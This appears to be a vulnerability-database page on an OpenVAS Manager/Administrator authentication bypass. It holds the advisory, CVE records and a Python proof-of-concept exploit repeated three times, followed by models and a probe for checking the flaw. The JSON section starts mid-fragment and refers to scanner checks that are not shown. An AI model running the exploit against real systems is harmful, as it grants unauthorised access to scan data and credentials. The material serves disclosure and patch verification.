[OVSA20131108] OpenVAS Manager And OpenVAS Administrator Vulnerable To Partial Authentication Bypass
2013-12-09T00:00:00
ID SECURITYVULNS:DOC:30085 Type securityvulns Reporter Securityvulns Modified 2013-12-09T00:00:00
Description
Summary
It has been identified that OpenVAS Manager and OpenVAS Administrator are
vulnerable to authentication bypass due to an incorrect state assignment when
processing OMP and OAP requests. It has been identified that this
vulnerability may allow unauthorised access to OpenVAS Manager and OpenVAS
Administrator on vulnerable systems. CVE-2013-6765 has been assigned to this
vulnerability in Manager and CVE-2013-6766 to the same vulnerability in
Administrator.
It should be noted that not all of the newly available commands are functional
and that exploitation typically requires SSH access to the host on which the
services are installed.
Current Status
As of the 8th November, the state of the vulnerabilities is believed
to be as follows. Patches have been supplied by Greenbone Networks which
successfully resolve this vulnerability. New releases of both OpenVAS
Manager and OpenVAS Administrator have also been created which incorporate
these patches.
Thanks
OpenVAS would like to thank Antonio Sanchez Arago for his help in reporting
the vulnerability and apologise to all concerned for the substantial delay
in triaging his report.
-- Tim Brown <mailto:timb@openvas.org> <http://www.openvas.org>
OVSA20131108.txt
OpenVAS Security Advisory (OVSA20131108)
Date: 8th November 2013
Product: OpenVAS Manager < 3.0.7 and < 4.0.4 and OpenVAS Administrator < 1.2.2 and < 1.3.2
Vendor: OpenVAS <http://www.openvas.org/>
Risk: Low
Summary
It has been identified that OpenVAS Manager and OpenVAS Administrator are
vulnerable to authentication bypass due to an incorrect state assignment when
processing OMP and OAP requests. It has been identified that this
vulnerability may allow unauthorised access to OpenVAS Manager and OpenVAS
Administrator on vulnerable systems. CVE-2013-6765 has been assigned to this
vulnerability in Manager and CVE-2013-6766 to the same vulnerability in
Administrator.
Current Status
As of the 8th November, the state of the vulnerabilities is believed
to be as follows. Patches have been supplied by Greenbone Networks which
successfully resolve this vulnerability. New releases of both OpenVAS
Manager and OpenVAS Administrator have also been created which incorporate
these patches.
Technical Details
It has been identified that OpenVAS Manager and OpenVAS Administrator are
vulnerable to authentication bypass due to an invalid state assignment when
processing OMP and OAP requests.
Upon processing an OMP and OAP request to retrieve the version information
from OpenVAS Administrator and OpenVAS Manager, the state is incorrectly set
to CLIENT_AUTHENTIC, allowing additional OMP and OAP commands to be called.
This can be seen in the omp_xml_handle_end_element() function from omp.c (for
OpenVAS Manager):
    if (client_state)
      set_client_state (CLIENT_AUTHENTIC);
    else
      set_client_state (CLIENT_TOP);
    break;
In this instance, the first condition will always hold, because client_state
is never zero when this code runs. Instead, the check should be whether
client_state is currently set to CLIENT_GET_VERSION_AUTHENTIC.
It should be noted that not all of the newly available commands are functional,
since they often rely upon additional session state information being present
which will not be the case where the authentication has been bypassed.
Furthermore, the vulnerable code path is typically only accessible to users
who have logged into a host running OpenVAS Manager or OpenVAS Administrator
via SSH as the affected services are typically only bound to localhost.
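The state transition described above, modelled as a regression check a maintainer might keep beside the fix. This is an added illustration, not code from OpenVAS Manager's omp.c: only the state names CLIENT_TOP, CLIENT_AUTHENTIC and CLIENT_GET_VERSION_AUTHENTIC and the quoted if/else come from the advisory; the CLIENT_GET_VERSION state, the enum values, the command dispatch and the two-command session are assumptions.

```c
/* Minimal model of the OMP client state machine around <get_version/>.
 * Constructed for illustration; enum values, CLIENT_GET_VERSION and the
 * dispatcher are assumptions, not OpenVAS Manager's actual code. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

typedef enum {
    CLIENT_TOP = 0,               /* connected, not yet authenticated        */
    CLIENT_AUTHENTIC,             /* authenticated, at top level             */
    CLIENT_GET_VERSION,           /* inside <get_version>, unauthenticated   */
    CLIENT_GET_VERSION_AUTHENTIC  /* inside <get_version>, authenticated     */
} client_state_t;

typedef enum { CMD_OK, CMD_NEEDS_AUTH } cmd_result_t;

static client_state_t client_state;

static void set_client_state (client_state_t s) { client_state = s; }

/* End-element handler for <get_version/> as quoted in the advisory. Both
 * states that can reach this point are non-zero, so the first branch is
 * always taken and an unauthenticated client ends up CLIENT_AUTHENTIC. */
static void end_get_version_vulnerable (void)
{
    if (client_state)
        set_client_state (CLIENT_AUTHENTIC);
    else
        set_client_state (CLIENT_TOP);
}

/* Corrected handler: only a client that was already authenticated when it
 * entered <get_version> returns to CLIENT_AUTHENTIC. */
static void end_get_version_fixed (void)
{
    if (client_state == CLIENT_GET_VERSION_AUTHENTIC)
        set_client_state (CLIENT_AUTHENTIC);
    else
        set_client_state (CLIENT_TOP);
}

/* Dispatch one command. "authenticate" stands in for a successful credential
 * check; every command other than get_version/authenticate requires
 * CLIENT_AUTHENTIC. */
static cmd_result_t handle_command (const char *cmd, bool fixed)
{
    if (strcmp (cmd, "get_version") == 0) {
        /* start element: remember whether the client was authenticated */
        set_client_state (client_state == CLIENT_AUTHENTIC
                          ? CLIENT_GET_VERSION_AUTHENTIC
                          : CLIENT_GET_VERSION);
        /* end element */
        if (fixed)
            end_get_version_fixed ();
        else
            end_get_version_vulnerable ();
        return CMD_OK;
    }
    if (strcmp (cmd, "authenticate") == 0) {
        set_client_state (CLIENT_AUTHENTIC);
        return CMD_OK;
    }
    return client_state == CLIENT_AUTHENTIC ? CMD_OK : CMD_NEEDS_AUTH;
}

/* Run a command sequence from CLIENT_TOP; return the result of the last one. */
cmd_result_t run_session (const char *const *cmds, int n, bool fixed)
{
    cmd_result_t r = CMD_OK;
    set_client_state (CLIENT_TOP);
    for (int i = 0; i < n; i++)
        r = handle_command (cmds[i], fixed);
    return r;
}

/* Constructed two-command session: an unauthenticated <get_version/> followed
 * by a command that must require authentication. True means the second
 * command was accepted without credentials. */
bool bypass_possible (bool fixed)
{
    static const char *const session[] = { "get_version", "get_targets" };
    return run_session (session, 2, fixed) == CMD_OK;
}

/* The authenticated path must keep working after the fix. */
bool authenticated_flow_ok (bool fixed)
{
    static const char *const session[] = { "authenticate", "get_version", "get_targets" };
    return run_session (session, 3, fixed) == CMD_OK;
}

int main (void)
{
    printf ("vulnerable handler: bypass=%d\n", bypass_possible (false));
    printf ("fixed handler:      bypass=%d, authenticated flow ok=%d\n",
            bypass_possible (true), authenticated_flow_ok (true));
    return 0;
}
```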
Fix
OpenVAS recommends that the publicly available patches are applied. If
building from source, then patches r18285 (for OpenVAS Administrator 1.2.x) or
r18281 (for Administrator 1.3.x) and r18276 (for OpenVAS Manager 3.0.x) or
r18271 (for Manager 4.0.x) should be obtained from the OpenVAS SVN repository.
A fresh tarball containing the latest stable release of Administrator
can be obtained from:
* http://wald.intevation.org/frs/download.php/1442/openvas-administrator-1.3.2.tar.gz
A fresh tarball containing the latest stable release of Manager
can be obtained from:
* http://wald.intevation.org/frs/download.php/1434/openvas-manager-4.0.4.tar.gz
In the event that OpenVAS has been supplied as part of a distribution then
the vendor or organisation concerned should be contacted for a patch. Known
major distributors of OpenVAS precompiled packages have already been notified.
History
On the 3rd August 2013, Antonio Sanchez Arago initially attempted to contact the
OpenVAS security team to report the issue in OpenVAS Manager; however, it was
missed as many of the team were on annual leave.
Unfortunately, it was not picked up until Antonio attempted to contact us again
in late October. On this occasion, it was picked up and the team were able
to reproduce the vulnerability.
On the 7th November, we contacted Antonio to confirm that the team had
successfully reproduced the issue and Greenbone Networks to notify them of the
vulnerability and request assistance in coordinating the disclosure. Major
distributors of OpenVAS precompiled packages were also notified about the
upcoming patches.
New versions of both OpenVAS Manager and OpenVAS Administrator were released on
the 8th.
The OpenVAS security team then contacted MITRE and on the 9th November,
CVE-2013-6764 and CVE-2013-6766 were assigned for this vulnerability.
Thanks
OpenVAS would like to thank Antonio Sanchez Arago for his help in reporting
the vulnerability and apologise to all concerned for the substantial delay
in triaging his report.
Response:\\n\\n' + res;\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T14:44:45", "description": "OpenVAS Administrator 1.2 before 1.2.2 and 1.3 before 1.3.2 allows remote attackers to bypass the OAP authentication restrictions and execute OAP commands via a crafted OAP request for version information, which causes the state to be set to CLIENT_AUTHENTIC.", "cvss3": {}, "published": "2014-05-19T14:55:00", "type": "cve", "title": "CVE-2013-6766", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6766"], "modified": "2014-05-20T11:37:00", "cpe": ["cpe:/a:openvas:openvas_administrator:1.3.0", "cpe:/a:openvas:openvas_administrator:1.2", "cpe:/a:openvas:openvas_administrator:1.2.1", "cpe:/a:openvas:openvas_administrator:1.3", "cpe:/a:openvas:openvas_administrator:1.2.0", "cpe:/a:openvas:openvas_administrator:1.3.1"], "id": "CVE-2013-6766", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6766", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:openvas:openvas_administrator:1.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_administrator:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_administrator:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_administrator:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_administrator:1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_administrator:1.3:beta1:*:*:*:*:*:*", 
"cpe:2.3:a:openvas:openvas_administrator:1.2.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:44:43", "description": "OpenVAS Manager 3.0 before 3.0.7 and 4.0 before 4.0.4 allows remote attackers to bypass the OMP authentication restrictions and execute OMP commands via a crafted OMP request for version information, which causes the state to be set to CLIENT_AUTHENTIC, as demonstrated by the omp_xml_handle_end_element function in omp.c.", "cvss3": {}, "published": "2014-05-19T14:55:00", "type": "cve", "title": "CVE-2013-6765", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6765"], "modified": "2014-05-19T19:03:00", "cpe": ["cpe:/a:openvas:openvas_manager:3.0", "cpe:/a:openvas:openvas_manager:4.0.2", "cpe:/a:openvas:openvas_manager:3.0.2", "cpe:/a:openvas:openvas_manager:4.0", "cpe:/a:openvas:openvas_manager:3.0.4", "cpe:/a:openvas:openvas_manager:3.0.6", "cpe:/a:openvas:openvas_manager:4.0.1", "cpe:/a:openvas:openvas_manager:3.0.5", "cpe:/a:openvas:openvas_manager:4.0.0", "cpe:/a:openvas:openvas_manager:3.0.3", "cpe:/a:openvas:openvas_manager:3.0.0", "cpe:/a:openvas:openvas_manager:4.0.3", "cpe:/a:openvas:openvas_manager:3.0.1"], "id": "CVE-2013-6765", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6765", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:openvas:openvas_manager:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0:beta5:*:*:*:*:*:*", 
"cpe:2.3:a:openvas:openvas_manager:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:beta6:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:beta8:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:beta7:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:44:43", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2013-6795. Reason: This candidate is a duplicate of CVE-2013-6795. A typo in an external publication caused this ID to be associated with the wrong vulnerability. Notes: All CVE users should reference CVE-2013-6795 instead of this candidate. 
All references and descriptions in this candidate have been removed to prevent accidental usage.", "cvss3": {}, "published": "2014-05-19T14:55:00", "type": "cve", "title": "CVE-2013-6764", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2013-6764", "CVE-2013-6795"], "modified": "2014-05-19T14:55:00", "cpe": [], "id": "CVE-2013-6764", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6764", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "zdt": [{"lastseen": "2018-03-14T09:20:14", "description": "OpenVAS Manager 3.0 before 3.0.7 and 4.0 before 4.0.4 allows remote attackers to bypass the OMP authentication restrictions and execute OMP commands via a crafted OMP request for version information, which causes the state to be set to CLIENT_AUTHENTIC, as demonstrated by the omp_xml_handle_end_element function in omp.c.", "cvss3": {}, "published": "2014-07-21T00:00:00", "type": "zdt", "title": "OpenVAS Manager 4.0 - Authentication Bypass Vulnerability PoC", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-6765"], "modified": "2014-07-21T00:00:00", "id": "1337DAY-ID-22456", "href": "https://0day.today/exploit/description/22456", "sourceData": "#!/usr/bin/python\r\n \r\n# Exploit Title: OpenVAS Manager 4.0 Authentication Bypass Vulnerability PoC\r\n# Date: 09/07/2014\r\n# Exploit Author: EccE\r\n# Vendor Homepage: http://www.openvas.org/\r\n# Software Link: http://wald.intevation.org/frs/?group_id=29\r\n# Version: OpenVAS Manager 4.0\r\n# Tested on: Debian GNU/Linux testing (jessie)\r\n# CVE : CVE-2013-6765\r\n \r\n\"\"\"\r\n Small list of working commands\r\n \r\nget_agents\r\nget_configs\r\nget_alerts\r\nget_filters\r\nget_lsc_credentials\r\nget_notes\r\nget_nvts\r\nget_targets\r\nget_users\r\nget_schedules\r\n \r\n \r\nMore commands (~70 commands) can be found directly in the omc.c file. 
Not all of them are working though.\r\nAs designed in OMP protocol, commands must be sent this way : <COMMAND/>\r\n \r\n\"\"\"\r\n \r\nimport socket, ssl\r\n \r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n \r\n# Require a certificate from the server. We used a self-signed certificate\r\n# so here cacerts.pem must be the server certificate itself.\r\nssl_sock = ssl.wrap_socket(s,\r\n ca_certs=\"/var/lib/openvas/CA/cacert.pem\",\r\n cert_reqs=ssl.CERT_REQUIRED)\r\n \r\n# OpenVAS Manager listen by default on localhost tcp/9390\r\nssl_sock.connect(('localhost', 9390))\r\n \r\n \r\nprint \"#################################################################\"\r\nprint \"# Proof of Concept - OpenVAS Manager 4.0 Authentication Bypass #\"\r\nprint \"#################################################################\"\r\nprint \"\\n\"\r\n \r\nprint \"--> Retrieving version...(exploiting the bug !)\\n\"\r\nssl_sock.write(\"<get_version/>\")\r\ndata = ssl_sock.read()\r\nprint data\r\nprint \"\\n\"\r\n \r\n \r\nprint \"--> Retrieving slaves...\\n\"\r\nssl_sock.write(\"<get_slaves/>\")\r\ntasks = ssl_sock.read()\r\nprint tasks\r\nprint \"\\n\"\r\n \r\n\"\"\"\r\nprint \"--> Creating note...\\n\"\r\nssl_sock.write(\"<create_note/>\")\r\nnote = ssl_sock.read()\r\nprint note\r\n \r\nprint \"--> Retrieving users list...\\n\"\r\nssl_sock.write(\"<get_users/>\")\r\nusers_list = ssl_sock.read()\r\nprint users_list\r\n\"\"\"\r\nssl_sock.close()\n\n# 0day.today [2018-03-14] #", "sourceHref": "https://0day.today/exploit/22456", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOpenVAS Manager 4.0 - Authentication Bypass", "edition": 2, "published": "2014-07-10T00:00:00", "title": "OpenVAS Manager 4.0 - Authentication Bypass", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6765"], "modified": "2014-07-10T00:00:00", "id": "EXPLOITPACK:2D2D48F68F9CEE070A2756D39113B224", "href": "", "sourceData": "#!/usr/bin/python\n\n# Exploit Title: OpenVAS Manager 4.0 Authentication Bypass Vulnerability PoC \n# Date: 09/07/2014\n# Exploit Author: EccE\n# Vendor Homepage: http://www.openvas.org/\n# Software Link: http://wald.intevation.org/frs/?group_id=29\n# Version: OpenVAS Manager 4.0 \n# Tested on: Debian GNU/Linux testing (jessie)\n# CVE : CVE-2013-6765\n\n\"\"\"\t\n\tSmall list of working commands\n\nget_agents \nget_configs \nget_alerts\nget_filters\nget_lsc_credentials \nget_notes \nget_nvts \nget_targets\nget_users\nget_schedules\n\n\nMore commands (~70 commands) can be found directly in the omc.c file. Not all of them are working though. \nAs designed in OMP protocol, commands must be sent this way : <COMMAND/>\n\n\"\"\"\n\nimport socket, ssl\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# Require a certificate from the server. 
We used a self-signed certificate\n# so here cacerts.pem must be the server certificate itself.\nssl_sock = ssl.wrap_socket(s,\n ca_certs=\"/var/lib/openvas/CA/cacert.pem\", \n cert_reqs=ssl.CERT_REQUIRED)\n\n# OpenVAS Manager listen by default on localhost tcp/9390\nssl_sock.connect(('localhost', 9390))\n\n\nprint \"#################################################################\"\nprint \"# Proof of Concept - OpenVAS Manager 4.0 Authentication Bypass #\"\nprint \"#################################################################\"\nprint \"\\n\"\n\nprint \"--> Retrieving version...(exploiting the bug !)\\n\"\nssl_sock.write(\"<get_version/>\")\ndata = ssl_sock.read()\nprint data\nprint \"\\n\"\n\n\nprint \"--> Retrieving slaves...\\n\"\nssl_sock.write(\"<get_slaves/>\")\ntasks = ssl_sock.read()\nprint tasks\nprint \"\\n\"\n\n\"\"\"\nprint \"--> Creating note...\\n\"\nssl_sock.write(\"<create_note/>\")\nnote = ssl_sock.read()\nprint note \n\nprint \"--> Retrieving users list...\\n\"\nssl_sock.write(\"<get_users/>\")\nusers_list = ssl_sock.read()\nprint users_list\n\"\"\"\nssl_sock.close()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-04T17:44:04", "description": "", "cvss3": {}, "published": "2014-07-10T00:00:00", "type": "exploitdb", "title": "OpenVAS Manager 4.0 - Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2013-6765", "CVE-2013-6765"], "modified": "2014-07-10T00:00:00", "id": "EDB-ID:34026", "href": 
"https://www.exploit-db.com/exploits/34026", "sourceData": "#!/usr/bin/python\r\n\r\n# Exploit Title: OpenVAS Manager 4.0 Authentication Bypass Vulnerability PoC \r\n# Date: 09/07/2014\r\n# Exploit Author: EccE\r\n# Vendor Homepage: http://www.openvas.org/\r\n# Software Link: http://wald.intevation.org/frs/?group_id=29\r\n# Version: OpenVAS Manager 4.0 \r\n# Tested on: Debian GNU/Linux testing (jessie)\r\n# CVE : CVE-2013-6765\r\n\r\n\"\"\"\t\r\n\tSmall list of working commands\r\n\r\nget_agents \r\nget_configs \r\nget_alerts\r\nget_filters\r\nget_lsc_credentials \r\nget_notes \r\nget_nvts \r\nget_targets\r\nget_users\r\nget_schedules\r\n\r\n\r\nMore commands (~70 commands) can be found directly in the omc.c file. Not all of them are working though. \r\nAs designed in OMP protocol, commands must be sent this way : <COMMAND/>\r\n\r\n\"\"\"\r\n\r\nimport socket, ssl\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n# Require a certificate from the server. We used a self-signed certificate\r\n# so here cacerts.pem must be the server certificate itself.\r\nssl_sock = ssl.wrap_socket(s,\r\n ca_certs=\"/var/lib/openvas/CA/cacert.pem\", \r\n cert_reqs=ssl.CERT_REQUIRED)\r\n\r\n# OpenVAS Manager listen by default on localhost tcp/9390\r\nssl_sock.connect(('localhost', 9390))\r\n\r\n\r\nprint \"#################################################################\"\r\nprint \"# Proof of Concept - OpenVAS Manager 4.0 Authentication Bypass #\"\r\nprint \"#################################################################\"\r\nprint \"\\n\"\r\n\r\nprint \"--> Retrieving version...(exploiting the bug !)\\n\"\r\nssl_sock.write(\"<get_version/>\")\r\ndata = ssl_sock.read()\r\nprint data\r\nprint \"\\n\"\r\n\r\n\r\nprint \"--> Retrieving slaves...\\n\"\r\nssl_sock.write(\"<get_slaves/>\")\r\ntasks = ssl_sock.read()\r\nprint tasks\r\nprint \"\\n\"\r\n\r\n\"\"\"\r\nprint \"--> Creating note...\\n\"\r\nssl_sock.write(\"<create_note/>\")\r\nnote = ssl_sock.read()\r\nprint 
note \r\n\r\nprint \"--> Retrieving users list...\\n\"\r\nssl_sock.write(\"<get_users/>\")\r\nusers_list = ssl_sock.read()\r\nprint users_list\r\n\"\"\"\r\nssl_sock.close()", "sourceHref": "https://www.exploit-db.com/download/34026", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
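The two Greenbone NVTs above and the EccE proof of concept all exercise the same flaw from different angles: the manager answers `<get_version/>` before login, and in the affected releases the handler for that command leaves the session in CLIENT_AUTHENTIC, so whatever follows on the same connection runs as if `<authenticate/>` had succeeded. The NVT's check is to send `<get_version/><get_targets/>` in one request and look for a real target listing in the reply. The following is an added example, written for this page rather than taken from OpenVAS, Greenbone or the exploit author: a Python 3 model of the vulnerable and fixed state transition, the NVT's probe and decision logic, and a live probe function that replaces the PoC's Python 2 `ssl.wrap_socket` call (removed in Python 3.12). The state machine is a deliberately simplified model of the behaviour the advisory and CVE text describe, not the real `omp.c`; the target UUID, the `admin`/`s3cret` credentials, the `Not authenticated` status text and the `check_hostname = False` choice are constructed assumptions for the example. Port 9390 and the CA path are the ones the PoC uses.

```python
"""
Model of the OMP authentication-state bug (CVE-2013-6765) plus the probe
that the Greenbone NVT sends to a live OpenVAS Manager.

Added example, not OpenVAS/Greenbone code and not the exploit-db PoC.
The state machine is a simplified model of the described behaviour, not
the real omp.c; sample targets, credentials and status texts are constructed.
"""
import socket
import ssl
import xml.etree.ElementTree as ET

# Session states named after the ones the CVE text mentions.
CLIENT_TOP = "CLIENT_TOP"              # connected, not yet authenticated
CLIENT_AUTHENTIC = "CLIENT_AUTHENTIC"  # logged in, all OMP commands allowed

# Constructed sample data standing in for the manager's database.
SAMPLE_TARGETS = {"daba56c8-73ec-11df-a475-002264764cea": "Localhost"}
SAMPLE_USERS = {"admin": "s3cret"}


class OmpManagerModel:
    """Tiny model of the OMP command handler; fixed=False reproduces the bug."""

    def __init__(self, fixed):
        self.fixed = fixed
        self.state = CLIENT_TOP

    def handle(self, request):
        """Process one OMP request string holding one or more sibling commands."""
        # OMP sends bare sibling elements, so wrap them for ElementTree.
        root = ET.fromstring("<omp>" + request.strip() + "</omp>")
        return "".join(self._dispatch(cmd) for cmd in root)

    def _dispatch(self, cmd):
        name = cmd.tag
        if name == "get_version":
            resp = ('<get_version_response status="200" status_text="OK">'
                    '<version>4.0</version></get_version_response>')
            if not self.fixed:
                # The bug (CVE text: end-element handler in omp.c): finishing the
                # version command reset the session to the post-login state
                # instead of the state it came from, so the client is now "logged in".
                self.state = CLIENT_AUTHENTIC
            return resp
        if name == "authenticate":
            creds = cmd.find("credentials")
            user = creds.findtext("username") if creds is not None else None
            pw = creds.findtext("password") if creds is not None else None
            if user in SAMPLE_USERS and SAMPLE_USERS[user] == pw:
                self.state = CLIENT_AUTHENTIC
                return '<authenticate_response status="200" status_text="OK"/>'
            return '<authenticate_response status="400" status_text="Authentication failed"/>'
        if self.state != CLIENT_AUTHENTIC:
            # Every other command requires a login (status text is constructed).
            return '<%s_response status="400" status_text="Not authenticated"/>' % name
        if name == "get_targets":
            body = "".join('<target id="%s"><name>%s</name></target>' % (tid, tname)
                           for tid, tname in SAMPLE_TARGETS.items())
            return '<get_targets_response status="200" status_text="OK">%s</get_targets_response>' % body
        return '<%s_response status="200" status_text="OK"/>' % name


def build_probe():
    """The request the NVT sends: the pre-auth command, then one that needs a login."""
    return "<get_version/><get_targets/>\r\n"


def is_bypassed(response):
    """The NVT's decision: a target listing came back on a connection that never authenticated."""
    return "get_targets_response" in response and "target id" in response


def probe_manager(host, port=9390, cafile="/var/lib/openvas/CA/cacert.pem", timeout=10):
    """Send the probe to a live OMP service over TLS; not exercised offline."""
    ctx = ssl.create_default_context(cafile=cafile)
    # The PoC points cafile at the self-signed server cert itself, whose CN
    # rarely matches the host name; keep chain verification, skip the name check.
    ctx.check_hostname = False
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(build_probe().encode())
            response = tls.recv(4096).decode(errors="replace")
    return is_bypassed(response), response


if __name__ == "__main__":
    for fixed in (False, True):
        reply = OmpManagerModel(fixed=fixed).handle(build_probe())
        print("fixed=%s bypassed=%s" % (fixed, is_bypassed(reply)))
```

Running the model shows `fixed=False bypassed=True` and `fixed=True bypassed=False`: the fixed handler still answers `<get_version/>`, but the following `<get_targets/>` is refused because the session never left CLIENT_TOP. Against a live host, `probe_manager` returns the same boolean the NVT derives, together with the raw reply for the report; a `status="400"` reply on the `get_targets_response` is the patched behaviour.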